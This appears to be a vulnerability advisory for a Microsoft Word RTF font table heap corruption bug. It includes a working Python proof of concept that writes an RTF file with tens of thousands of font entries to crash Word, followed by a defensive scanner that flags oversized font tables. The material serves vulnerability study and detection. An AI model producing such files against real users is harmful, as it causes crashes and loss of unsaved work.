Vulnerability Impact
When the victim opens the RTF file generated by the Python code below, the RTF parser processes the malicious content and triggers a heap overflow; Microsoft Word crashes, and any unsaved content in the user's other open Word documents is lost.
Vulnerability Reproduction
The PoC is as follows:
#!/usr/bin/python
#
# PoC for:
# Microsoft Word RTF Font Table Heap Corruption Vulnerability
#
# by Joshua J. Drake (@jduck)
#
# Note: bytes formatting with % requires Python 2 or Python 3.5+.
import sys

# allow overriding the number of fonts
num = 32761
if len(sys.argv) > 1:
    num = int(sys.argv[1])

f = open("tezt.rtf", "wb")
# open the RTF document and the font table group
f.write(b"{\\rtf1{\n{\\fonttbl")
# emit one \fN font definition per entry
for i in range(num):
    f.write(b"{\\f%dA;}\n" % i)
# close the font table
f.write(b"}\n")
f.write(b"{\\rtlch it didn't crash?? no calc?! BOO!!!}\n")
# close the remaining groups
f.write(b"}}\n")
f.close()
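As an added defensive example (not part of the original PoC or the author's code), the scanner below parses the {\fonttbl ...} group of an RTF file with brace-depth tracking, counts the \fN font definitions it contains, and flags files whose count exceeds a threshold. The 16384 limit, the make_sample helper and the function names are assumptions chosen for illustration.

```python
import re
import sys

FONT_DEF = re.compile(rb"\\f(\d+)")
FONT_LIMIT = 16384  # assumption: illustrative ceiling, not a documented Word limit


def fonttbl_group(data: bytes) -> bytes:
    """Return the raw bytes of the first {\\fonttbl ...} group.

    Brace depth is tracked so nested font entries stay inside the group;
    a backslash escapes the following byte, so \\{ and \\} do not count.
    """
    start = data.find(b"{\\fonttbl")
    if start < 0:
        return b""
    depth = 0
    i = start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            i += 2  # skip the escaped byte (control word or escaped brace)
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return data[start:i + 1]
        i += 1
    return data[start:]  # unterminated group: scan what is there


def count_fonts(data: bytes) -> int:
    """Count \\fN font definitions inside the font table group only."""
    return len(FONT_DEF.findall(fonttbl_group(data)))


def is_suspicious(data: bytes, limit: int = FONT_LIMIT) -> bool:
    return count_fonts(data) > limit


def make_sample(num: int) -> bytes:
    """Constructed sample RTF mirroring the PoC's layout with `num` font entries."""
    body = b"".join(b"{\\f%dA;}\n" % i for i in range(num))
    return b"{\\rtf1{\n{\\fonttbl" + body + b"}\n{\\rtlch text}\n}}\n"


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            blob = fh.read()
        print(path, count_fonts(blob), "SUSPICIOUS" if is_suspicious(blob) else "ok")
```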